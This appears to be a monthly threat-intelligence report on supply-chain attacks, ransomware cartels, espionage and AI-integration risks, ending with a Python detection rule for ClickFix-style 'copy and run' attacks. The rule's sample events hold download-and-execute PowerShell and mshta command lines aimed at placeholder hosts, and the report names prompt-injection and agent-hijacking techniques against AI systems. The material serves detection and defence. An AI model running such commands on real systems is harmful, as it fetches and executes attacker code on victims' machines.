Overview
November saw a significant increase in attacks involving ecosystem-level compromise, SaaS and support-platform targeting, and rapid experimentation with AI-enabled tradecraft. Supply chain attacks escalated from isolated package backdoors to full ecosystem disruption in npm, PyPI, and NuGet, while China- and DPRK-aligned operators weaponized software updates, recruitment platforms, and router implants for durable espionage access. Ransomware and extortion crews continued to consolidate into cartel formations, with Scattered LAPSUS$ Hunters and The Gentlemen investing in full RaaS stacks and cross-platform payloads. At the same time, defenders confronted a rapidly maturing threat surface around AI browsers, agentic Windows features, and multi-agent ecosystems, where prompt injection, metadata abuse, and side channels now create material risk even in the absence of classic exploits.
Key Trends Identified
- Supply-chain and developer-ecosystem compromise at scale: Shai-Hulud’s self-spreading npm worm, IndonesianFoods registry flooding, time-bombed NuGet packages targeting PLCs, Tsundere’s cross-platform Node.js botnet, and multiple malicious PyPI packages (legacy bootstrap scripts, “spellcheckers”) turned developer pipelines into primary intrusion vectors rather than secondary risk.
- SaaS, support, and identity infrastructure as primary targets: Scattered LAPSUS$ Hunters expanded to Zendesk, ShinyHunters abused Gainsight–Salesforce OAuth integrations, and Eurofiber’s ticketing breach reinforced how customer-support portals, connectors, and case systems deliver privileged access to enterprise data.
- Cartelization and RaaS industrialization: Scattered LAPSUS$ Hunters (SLH) formalized an extortion collective uniting Scattered Spider, LAPSUS$, and ShinyHunters, while ShinySp1d3r and The Gentlemen rolled out mature RaaS platforms with anti-forensics, ETW suppression, and cross-platform encryptors, positioning newer brands alongside entrenched ransomware ecosystems.
- AI and AI-agent attack surface expansion: HashJack prompt injection in AI browsers, Microsoft’s agent workspace for Windows, agent session smuggling in multi-agent systems, prompt injection in GitLab Duo, SSRF in ChatGPT Custom GPT Actions, and SSRF in Kibana’s AI Assistant demonstrated that AI integrations now act as first-class attack paths for data exfiltration and covert control.
- Abuse of mainstream cloud and update infrastructure: PlushDaemon’s EdgeStepper router implant for update hijacking, Update Health Tools’ Azure blob hijack path, SesameOp’s OpenAI-based C2, Cloudflare’s global outage impact, and legacy bootstrap domains in Python packaging highlighted how configuration drift, abandoned domains, and cloud dependencies can deliver effects comparable to direct compromise.
- ClickFix-style social engineering as a common denominator: Multiple campaigns (ClickFix steganographic loaders, EVALUSION with Amatera and NetSupport RAT, DPRK Contagious Interview fake platforms, new RomCom delivery through SocGholish FAKEUPDATE) used “copy and run this command” flows to turn users into the execution mechanism for in-memory loaders and multi-stage stealers across Windows and macOS.
- Malware and loaders focused on evasive execution chains: ShadowV2, TamperedChef, Python-based loaders, RONINGLOADER, MastaStealer, and advanced ClickFix variants all relied on steganography, staged archives, heavy obfuscation, and process injection into trusted binaries to bypass signature-driven controls and increase dwell time.
- Targeted cyber-espionage against government, research, and dissident communities: APT24’s BadAudio, PlushDaemon, Dragon Breath’s RONINGLOADER, SpearSpecter, Ferocious Kitten, Operation SkyCloak, APT-C-60’s SpyGlace, and SmudgedSerpent all pursued sustained access to policy experts, defense sectors, regional governments, and activists through bespoke lures and refined toolchains.
- Emergent mobile and NFC-enabled fraud ecosystems: Sturnus, Fantasy Hub, BankBot-YNRK, DeliveryRAT, NGate NFC relay, and Android MaaS offerings for banking and spyware operations continued to expand access to real-time communications, financial apps, and ATM interactions.
- Edge and appliance exploitation as a recurring entry point: FortiWeb CVE-2025-64446, CWP CVE-2025-48703, Orphaned Update Health Tools, and ongoing “Top CVEs of the Week” coverage reinforced that exposed management planes and security appliances remain high-priority targets for both broad exploitation and targeted intrusion.
Threat Landscape Overview
The operational pattern across November shows adversaries gravitating toward low-friction, high-leverage control planes: developer registries, SaaS connectors, customer-support platforms, and AI-integrated services. Supply chain operations moved beyond isolated malicious packages toward ecosystem-scale disruption in npm, NuGet, and PyPI, with Shai-Hulud’s worm, IndonesianFoods’ registry flooding, and NuGet time bombs all aimed at long-term sabotage and credential theft across development environments and industrial systems. In parallel, China- and DPRK-linked operators focused on scalable access through update hijacking (PlushDaemon’s EdgeStepper), trojanized installers (TamperedChef, Dragon Breath’s NSIS chains), and recruitment-themed delivery for macOS and Windows (FlexibleFerret, DPRK Contagious Interview platform, APT-C-60). These operations paired stealthy loaders, DLL sideloading, and router implants with disciplined C2 and filtering to preserve high-value access.
At the strategic level, ransomware and extortion ecosystems continued to mature, converging toward cartel structures that blend technical sophistication with harassment, brand management, and public narrative control. Scattered LAPSUS$ Hunters and the emerging ShinySp1d3r RaaS embody this shift, borrowing from LockBit and other large programs while testing custom stacks and SLH-branded operations. Campaigns from The Gentlemen, Kraken, Cephalus, and Nevada’s statewide incident illustrate ongoing pressure on virtual infrastructure, RDP exposure, and backup resilience. Simultaneously, AI-adjacent risks moved from theoretical concern to practical exploitation, through AI browser prompt injection, SSRF chains in AI-driven features, and multi-agent session hijacking. Whisper Leak’s traffic-analysis toolkit underscored that even encrypted chatbot interactions can leak topic information, and mitigation work by Microsoft and OpenAI shows that defenders now have to manage risk in both model content and the surrounding metadata exhaust. As a result, confidence in platforms, connectors, and AI agents is becoming more fragile, pushing security teams to double down on provenance controls, behavioral monitoring, and tightly governed automation and third-party access.
Industries Targeted
- Cloud, SaaS & DevOps: Shai-Hulud npm worm, IndonesianFoods registry flooding, malicious npm cloaking by dino_reborn, Tsundere botnet using Node.js and Ethereum-based C2, PyPI and NuGet backdoors, GitLab Duo prompt injection, Kibana SSRF, CWP command execution, and exploitation of legacy bootstrap scripts and abandoned domains in Python packaging.
- Finance, Fintech & Crypto: Sturnus Android banking trojan, Fantasy Hub MaaS targeting Russian banks, BankBot-YNRK and DeliveryRAT financial stealers, NGate NFC relay ATM fraud, spyware campaigns harvesting wallet data on macOS (Nova Stealer), and DPRK recruitment operations targeting AI and crypto firms.
- Government & Defense: APT24 BadAudio supply-chain espionage, PlushDaemon update hijacking, Operation SkyCloak against Russian and Belarusian military units, SpearSpecter operations against senior officials, Ferocious Kitten surveillance of dissidents, Nevada’s statewide ransomware incident, and the CBO breach affecting U.S. fiscal analysis.
- Manufacturing, Industrial & Critical Infrastructure: PlushDaemon’s SlowStepper backdoor against manufacturers and ICS-adjacent environments, Sharp7Extend NuGet time bombs against Siemens PLCs, Tsundere’s Node-based botnet across industrial endpoints, and Kraken/Cephalus targeting virtualized infrastructure that often underpins OT management.
- Telecommunications, Hosting & Internet Infrastructure: Cloudflare global outage and subsequent analysis, CWP exploitation, EdgeStepper router implants, Operation SkyCloak’s Tor-based SSH backdoors, and Update Health Tools’ Azure storage hijack demonstrating how infrastructure and routing layers can cascade into broad disruption.
Most Active Threat Actors
- ClickFix-adjacent Stealer Ecosystem (ACR / Amatera, Lumma, Rhadamanthys): Large-scale malvertising and fake update operations using memory-only PowerShell and .NET loaders, steganographic payloads, and dual-use infostealers with RAT follow-on access.
- DPRK Clusters (FlexibleFerret / Contagious Interview variants): macOS-focused recruitment lures, full fake job platforms targeting AI and crypto talent, multi-stage loaders, Golang backdoors, and credential theft through decoy applications and clipboard hijack chains.
- Dragon Breath / Miuuti Group (APT-Q-27): RONINGLOADER campaigns using trojanized installers, steganographic payloads, and Gh0st RAT deployment with extensive EDR evasion and security-tool tampering across East Asian user bases.
- Iran-aligned Clusters (SpearSpecter / Ferocious Kitten / SmudgedSerpent): Multi-week WhatsApp rapport-building with TAMECAT PowerShell backdoors, MarkiRAT surveillance of dissidents, and SmudgedSerpent phishing against U.S. policy experts using RMM for persistent espionage access.
- PlushDaemon & APT24 (PRC-aligned): Long-running espionage clusters using EdgeStepper router implants, JavaScript supply-chain attacks, BadAudio loaders, Cobalt Strike payloads, and update channel hijacking against governments, universities, and regional organizations.
- Scattered LAPSUS$ Hunters / ShinyHunters / Scattered Spider (The Com): Unified extortion collective pivoting between Snowflake and SaaS intrusions, Gainsight–Salesforce OAuth abuse, Zendesk phishing, and early-stage ShinySp1d3r RaaS development.
- SesameOp and AI-abuse operators: Threat actors repurposing OpenAI APIs for resilient C2, experimenting with PROMPTFLUX AI-regenerated malware, abusing GitLab Duo and ChatGPT Actions for prompt injection and SSRF, and probing AI browsers for URL-fragment prompt injection and data exfiltration opportunities.
- Shai-Hulud & IndonesianFoods Operators (Supply-chain): Npm worm and registry-flooding campaigns that weaponize package installation and dependency chains for credential theft, GitHub compromise, and ecosystem disruption.
- The Gentlemen & Kraken (Ransomware): Rapidly maturing big-game hunters with cross-platform payloads, benchmark-based encryption optimization, affiliate recruitment, and aggressive anti-forensics in Windows, Linux, and ESXi environments.
- Tsundere, ShadowV2, and related botnet operators: Node.js-based cross-platform botnets using blockchain-backed C2, Mirai-derived IoT exploitation, and stress-testing during global outages to refine DDoS and proxy capabilities against a wide geographic and industry spread.
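The ClickFix “copy and run this command” flows described under Key Trends and again for the ClickFix-adjacent stealer ecosystem above share one observable: a script host launched from a user-driven parent (Explorer’s Run dialog or a browser) with a download-and-execute, hidden-window, or encoded command line. The hunting rule below is an added example, not tooling from any of the reports summarised here; the process-creation records are constructed and the URLs are placeholders.

```python
import re

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# Made-up records for illustration only, not telemetry from the reports above.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/x)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/a.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe",          # admin job, not user-driven
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},
    {"parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -enc SQBFAFgA"},
]

# Parents that mean a human pasted/ran something (Run dialog, Explorer, browser).
USER_LAUNCH_PARENTS = ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe")
# Script hosts that ClickFix-style lures abuse for in-memory loaders.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")
INDICATORS = {
    "download-and-execute": re.compile(
        r"(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)"
        r"|mshta\s+https?://", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the indicator names matched by one event, or [] if the rule does not fire."""
    if basename(event["parent"]) not in USER_LAUNCH_PARENTS:
        return []
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]

def hunt(events):
    """Return (cmdline, matched indicators) for every event that fires the rule."""
    return [(e["cmdline"], hits) for e in events if (hits := classify(e))]

if __name__ == "__main__":
    for cmdline, hits in hunt(SAMPLE_EVENTS):
        print(f"{', '.join(hits):40} {cmdline}")
```

The parent-process gate is what keeps this usable: the same command-line patterns are routine under scheduled tasks or deployment agents, and only become suspicious when a user-facing parent spawned them.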
Hunter Insights
Adversaries are likely to intensify attacks on ecosystems and control planes rather than individual endpoints, focusing on developer registries, SaaS connectors, AI-integrated services, and edge appliances as efficient paths to both mass compromise and high-value data theft. Over the coming months, defenders should expect supply-chain infections in npm, PyPI, and NuGet, abuse of customer-support and identity platforms, and AI-agent prompt injection to converge into blended campaigns that chain together software updates, OAuth connectors, and AI workflows for stealthy access and long-lived persistence.
Ransomware and extortion operations will likely continue consolidating into cartel-like structures, with groups such as Scattered LAPSUS$ Hunters, ShinySp1d3r, The Gentlemen, and Kraken investing in mature RaaS stacks, cross-platform encryptors, and harassment-heavy extortion tactics targeting backups, virtual infrastructure, and executive-facing applications. At the same time, state-aligned and financially motivated actors are expected to expand espionage and fraud operations across routers, mobile devices, and NFC channels, using steganographic loaders, social-engineering “click-to-run” flows, and OpenAI-backed C2 to bypass traditional detection and exploit lingering exposure in government, cloud, financial, and industrial environments.